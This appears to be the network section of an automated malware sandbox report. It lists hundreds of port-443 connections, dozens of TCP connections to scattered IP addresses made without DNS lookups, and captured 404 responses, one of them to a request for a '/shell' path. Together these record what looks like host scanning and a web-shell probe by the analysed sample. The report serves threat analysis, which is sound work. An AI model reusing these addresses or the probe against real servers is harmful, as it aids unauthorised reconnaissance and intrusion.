Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60024
Source: unknown	Network traffic detected: HTTP traffic on port 44504 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60566 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35290
Source: unknown	Network traffic detected: HTTP traffic on port 36832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57636 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47026
Source: unknown	Network traffic detected: HTTP traffic on port 51608 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48110
Source: unknown	Network traffic detected: HTTP traffic on port 44108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60040
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37340
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38556
Source: unknown	Network traffic detected: HTTP traffic on port 41944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44550 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39636
Source: unknown	Network traffic detected: HTTP traffic on port 47862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56346 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60274
Source: unknown	Network traffic detected: HTTP traffic on port 56218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60030
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35282
Source: unknown	Network traffic detected: HTTP traffic on port 45142 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62455
Source: unknown	Network traffic detected: HTTP traffic on port 56850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43454 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47372
Source: unknown	Network traffic detected: HTTP traffic on port 39954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55810
Source: unknown	Network traffic detected: HTTP traffic on port 50150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53634
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39874
Source: unknown	Network traffic detected: HTTP traffic on port 45654 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35158
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33098
Source: unknown	Network traffic detected: HTTP traffic on port 47840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41944
Source: unknown	Network traffic detected: HTTP traffic on port 40084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50418
Source: unknown	Network traffic detected: HTTP traffic on port 40258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37340 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49264
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53800
Source: unknown	Network traffic detected: HTTP traffic on port 39618 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37048
Source: unknown	Network traffic detected: HTTP traffic on port 41048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59596
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57296
Source: unknown	Network traffic detected: HTTP traffic on port 56894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43950
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53814
Source: unknown	Network traffic detected: HTTP traffic on port 55616 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38000
Source: unknown	Network traffic detected: HTTP traffic on port 54988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50420
Source: unknown	Network traffic detected: HTTP traffic on port 60616 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59246
Source: unknown	Network traffic detected: HTTP traffic on port 47372 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33610 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44910
Source: unknown	Network traffic detected: HTTP traffic on port 36610 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53946
Source: unknown	Network traffic detected: HTTP traffic on port 48486 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36290
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39440
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50790
Source: unknown	Network traffic detected: HTTP traffic on port 56998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39566
Source: unknown	Network traffic detected: HTTP traffic on port 39372 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34610 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 32992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41992
Source: unknown	Network traffic detected: HTTP traffic on port 41202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52624
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49598
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48388
Source: unknown	Network traffic detected: HTTP traffic on port 55744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38328 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59428 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48144
Source: unknown	Network traffic detected: HTTP traffic on port 56766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47296
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37252
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48140
Source: unknown	Network traffic detected: HTTP traffic on port 55370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48260
Source: unknown	Network traffic detected: HTTP traffic on port 48722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60006
Source: unknown	Network traffic detected: HTTP traffic on port 55092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40370
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39022
Source: unknown	Network traffic detected: HTTP traffic on port 46236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53200
Source: unknown	Network traffic detected: HTTP traffic on port 42470 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56956
Source: unknown	Network traffic detected: HTTP traffic on port 45804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34920
Source: unknown	Network traffic detected: HTTP traffic on port 47642 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32990
Source: unknown	Network traffic detected: HTTP traffic on port 46374 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51394
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43992
Source: unknown	Network traffic detected: HTTP traffic on port 50790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54396 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39372
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56608
Source: unknown	Network traffic detected: HTTP traffic on port 35968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52366
Source: unknown	Network traffic detected: HTTP traffic on port 38386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51032
Source: unknown	Network traffic detected: HTTP traffic on port 38982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53402 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42658
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53340
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52250
Source: unknown	Network traffic detected: HTTP traffic on port 43474 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41202
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43624
Source: unknown	Network traffic detected: HTTP traffic on port 55606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45472 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54406 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55528
Source: unknown	Network traffic detected: HTTP traffic on port 49032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55886
Source: unknown	Network traffic detected: HTTP traffic on port 52042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 41992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42768
Source: unknown	Network traffic detected: HTTP traffic on port 33558 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41792
Source: unknown	Network traffic detected: HTTP traffic on port 45530 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43730
Source: unknown	Network traffic detected: HTTP traffic on port 43624 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38262
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38386
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56624
Source: unknown	Network traffic detected: HTTP traffic on port 59820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51178
Source: unknown	Network traffic detected: HTTP traffic on port 35282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55410
Source: unknown	Network traffic detected: HTTP traffic on port 40370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42878
Source: unknown	Network traffic detected: HTTP traffic on port 53392 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40450
Source: unknown	Network traffic detected: HTTP traffic on port 36446 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42470
Source: unknown	Network traffic detected: HTTP traffic on port 35692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53402
Source: unknown	Network traffic detected: HTTP traffic on port 47758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 32990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53890
Source: unknown	Network traffic detected: HTTP traffic on port 41074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44404
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45612
Source: unknown	Network traffic detected: HTTP traffic on port 37910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52322
Source: unknown	Network traffic detected: HTTP traffic on port 56212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53530
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54988
Source: unknown	Network traffic detected: HTTP traffic on port 38556 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37540 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56624 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45600 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 51794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45600
Source: unknown	Network traffic detected: HTTP traffic on port 36150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55606
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40030
Source: unknown	Network traffic detected: HTTP traffic on port 46490 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34630 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33610
Source: unknown	Network traffic detected: HTTP traffic on port 56956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52400 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51490
Source: unknown	Network traffic detected: HTTP traffic on port 44788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41598
Source: unknown	Network traffic detected: HTTP traffic on port 57878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44504
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43532
Source: unknown	Network traffic detected: HTTP traffic on port 51930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54406
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55616
Source: unknown	Network traffic detected: HTTP traffic on port 56118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38628 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39276
Source: unknown	Network traffic detected: HTTP traffic on port 45528 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35900
Source: unknown	Network traffic detected: HTTP traffic on port 55356 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55410 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60088
Source: unknown	Network traffic detected: HTTP traffic on port 39022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40258
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47840
Source: unknown	Network traffic detected: HTTP traffic on port 56608 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34462 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33428 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33558
Source: unknown	Network traffic detected: HTTP traffic on port 52624 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34524
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37910
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34650
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53170
Source: unknown	Network traffic detected: HTTP traffic on port 58234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47958
Source: unknown	Network traffic detected: HTTP traffic on port 46726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 41984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45654
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41058
Source: unknown	Network traffic detected: HTTP traffic on port 37660 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43474
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45530
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40084
Source: unknown	Network traffic detected: HTTP traffic on port 39440 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33428
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34878
Source: unknown	Network traffic detected: HTTP traffic on port 44556 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54480 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62455 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55356
Source: unknown	Network traffic detected: HTTP traffic on port 44986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56212
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54396
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54394
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48916
Source: unknown	Network traffic detected: HTTP traffic on port 56260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41048
Source: unknown	Network traffic detected: HTTP traffic on port 56018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45528
Source: unknown	Network traffic detected: HTTP traffic on port 55810 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 119.56.28.63
Source: unknown	TCP traffic detected without corresponding DNS query: 164.163.128.63
Source: unknown	TCP traffic detected without corresponding DNS query: 48.38.69.47
Source: unknown	TCP traffic detected without corresponding DNS query: 143.132.170.4
Source: unknown	TCP traffic detected without corresponding DNS query: 18.200.65.140
Source: unknown	TCP traffic detected without corresponding DNS query: 174.36.86.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.22.25.60
Source: unknown	TCP traffic detected without corresponding DNS query: 120.254.4.252
Source: unknown	TCP traffic detected without corresponding DNS query: 136.125.53.152
Source: unknown	TCP traffic detected without corresponding DNS query: 88.92.139.157
Source: unknown	TCP traffic detected without corresponding DNS query: 17.126.211.13
Source: unknown	TCP traffic detected without corresponding DNS query: 97.51.17.237
Source: unknown	TCP traffic detected without corresponding DNS query: 124.55.13.245
Source: unknown	TCP traffic detected without corresponding DNS query: 66.57.111.242
Source: unknown	TCP traffic detected without corresponding DNS query: 170.137.120.145
Source: unknown	TCP traffic detected without corresponding DNS query: 129.178.172.113
Source: unknown	TCP traffic detected without corresponding DNS query: 189.51.76.83
Source: unknown	TCP traffic detected without corresponding DNS query: 146.21.183.227
Source: unknown	TCP traffic detected without corresponding DNS query: 220.123.121.129
Source: unknown	TCP traffic detected without corresponding DNS query: 189.58.217.237
Source: unknown	TCP traffic detected without corresponding DNS query: 103.250.214.19
Source: unknown	TCP traffic detected without corresponding DNS query: 160.131.164.73
Source: unknown	TCP traffic detected without corresponding DNS query: 90.162.2.0
Source: unknown	TCP traffic detected without corresponding DNS query: 18.125.221.149
Source: unknown	TCP traffic detected without corresponding DNS query: 42.170.246.198
Source: unknown	TCP traffic detected without corresponding DNS query: 189.156.239.99
Source: unknown	TCP traffic detected without corresponding DNS query: 19.215.22.39
Source: unknown	TCP traffic detected without corresponding DNS query: 40.209.239.25
Source: unknown	TCP traffic detected without corresponding DNS query: 109.184.221.7
Source: unknown	TCP traffic detected without corresponding DNS query: 34.201.98.214
Source: unknown	TCP traffic detected without corresponding DNS query: 27.216.202.208
Source: unknown	TCP traffic detected without corresponding DNS query: 35.238.214.190
Source: unknown	TCP traffic detected without corresponding DNS query: 136.9.83.156
Source: unknown	TCP traffic detected without corresponding DNS query: 74.104.209.158
Source: unknown	TCP traffic detected without corresponding DNS query: 144.218.109.233
Source: unknown	TCP traffic detected without corresponding DNS query: 65.30.16.229
Source: unknown	TCP traffic detected without corresponding DNS query: 46.130.222.64
Source: unknown	TCP traffic detected without corresponding DNS query: 24.228.230.209
Source: unknown	TCP traffic detected without corresponding DNS query: 189.178.155.10
Source: unknown	TCP traffic detected without corresponding DNS query: 115.56.233.238
Source: unknown	TCP traffic detected without corresponding DNS query: 188.90.244.109
Source: unknown	TCP traffic detected without corresponding DNS query: 34.241.47.49
Source: unknown	TCP traffic detected without corresponding DNS query: 76.135.222.6
Source: unknown	TCP traffic detected without corresponding DNS query: 181.186.150.189
Source: unknown	TCP traffic detected without corresponding DNS query: 142.5.66.155
Source: unknown	TCP traffic detected without corresponding DNS query: 133.167.106.171
Source: unknown	TCP traffic detected without corresponding DNS query: 31.195.48.73
Source: unknown	TCP traffic detected without corresponding DNS query: 209.67.64.250
Source: unknown	TCP traffic detected without corresponding DNS query: 161.58.75.134
Source: unknown	TCP traffic detected without corresponding DNS query: 197.163.171.22

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 01 Nov 2021 09:08:31 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 01 Nov 2021 09:08:32 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:08:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:08:37 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
